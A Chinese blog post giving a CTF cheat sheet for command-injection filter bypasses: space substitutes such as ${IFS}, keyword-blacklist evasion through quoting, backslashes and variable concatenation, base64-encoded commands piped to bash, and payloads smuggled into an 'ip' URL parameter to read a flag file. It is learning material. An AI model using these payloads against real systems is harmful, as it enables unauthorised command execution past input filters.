首页 > 其他分享 >ctf-文件执行漏洞(绕过)

ctf-文件执行漏洞(绕过)

时间:2023-03-22 22:24:58浏览次数:40  
标签:ag IFS ip flag cat 漏洞 ctf 绕过

考察知识点:
文件执行漏洞
空格特殊字符、flag字符绕过
空格绕过
${IFS}
${IFS}$1
$IFS$1
<和<>
{cat,flag}
%20替换
%0a (换行)
%0d (回车)
%09 (tab
黑名单(关键字)绕过
单引号、双引号绕过:c"at"t fl''ag
反斜线绕过:ca\t fl\ag
num和@绕过:c$1at fl$@ag
拼接绕过:a=c;b=at;c=fl;d=ag; $a$b $c$d (不用加|)
/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php
/?ip=1;a=f;d=ag;c=l;cat$IFS$a$c$d.php
base64:
echo "Y2F0IGZsYWc="|base64 -d
echo "Y2F0IGZsYWc="|base64 -d|bash
|echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh


内联绕过
所谓内联绕过就是将反引号内命令的输出作为输入执行,比如系统对flag字符进行了过滤,那么我们可以通过ls命令将flag.php输出作为输入,有以下两种方式:
?ip=127.0.0.1;cat 'ls'
?ip=127.0.0.1;cat $(ls)

标签:ag,IFS,ip,flag,cat,漏洞,ctf,绕过
From: https://www.cnblogs.com/ZpHome/p/zpp.html

相关文章

  • pikachu-目录遍历漏洞、敏感信息泄露
    概述目录遍历漏洞概述在web功能设计中,很多时候我们会要将需要访问的文件定义成变量,从而让前端的功能便的更加灵活。当用户发起一个前端的请求时,便会将请求的......
  • BUUCTF-MISC-菜刀666
    下载得到一个流量包根据题目菜刀666,与菜刀有关,一般都是post连接,于是我们过滤post数据http.request.method==POST在tcp.streameq7中发现了大量数据右键追踪TCP流,看......
  • esxi主机安装完毕后漏洞:CVE-2018-3646解决方法
    [解决方案]由于此漏洞属于芯片级漏洞,更新固件会造成较大的性能损失,在私有云环境下,此漏洞的影响范围可控,我们可以选择禁用此提示,暂缓漏洞的修复。esxi主机安装完毕后漏洞:C......
  • wolvctf 2023 zombie xss
    当时做的时候没想到这道题考的是XSS,归结原因在于对nodejs的代码不熟悉。先上源码:bot.js源码就不放了,主要功能概括一下就是点击用户提交的链接,把flag放到cookie里传过去,很......
  • [MRCTF2020]Ezpop
    1.解题过程1.题目源代码<?php//flagisinflag.php//WTFISTHIS?//LearnFromhttps://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%......
  • CTF第十一天 binwalk stegsolve
    标题a_good_idea原理图片隐写目的获取完整图片中的flag环境kali/windows工具binwalk   stegsolve步骤首先在kali中对图片进行文件提取提取后得到一个文件夹把......
  • CVE-2019-1256漏洞分析
    0x00漏洞信息漏洞影响:本地提权漏洞文件:win32kfull.sys漏洞函数:GreGradientFill漏洞原因:空指针引用分析系统:Windows1903【漏洞分析合集】0x01漏洞分析崩溃时的堆栈......
  • docker之bwapp漏洞测试环境搭建
    (1)dockersearchbwapp,(2)dockerpull镜像名称,(3)启动容器,(4)浏览器中访问http://本机ip:端口/login.php:会出现提示:(5)访问http://本机ip:端口/install.php做数据库初始化操作,(6)重新登......
  • b01lers CTF & WolvCTF 2023 部分Re WriteUp
    这周打了两个比赛,个人感觉b01lersCTF偏简单一些,WolvCTF比前者难一点。养生型选手,一共做了三个题b01lersCTFSafe一个嵌入式逆向的题目,是逆向ArduinoUNO一个门锁......
  • [NPUCTF2020]ezinclude 1
    [NPUCTF2020]ezinclude1F12查看源码<!--md5($secret.$name)===$pass-->然后以为是要搞MD5的新漏洞姿势,看来WP才发现,不是这样的,是相应包里面有MD5加密后的东西填到P......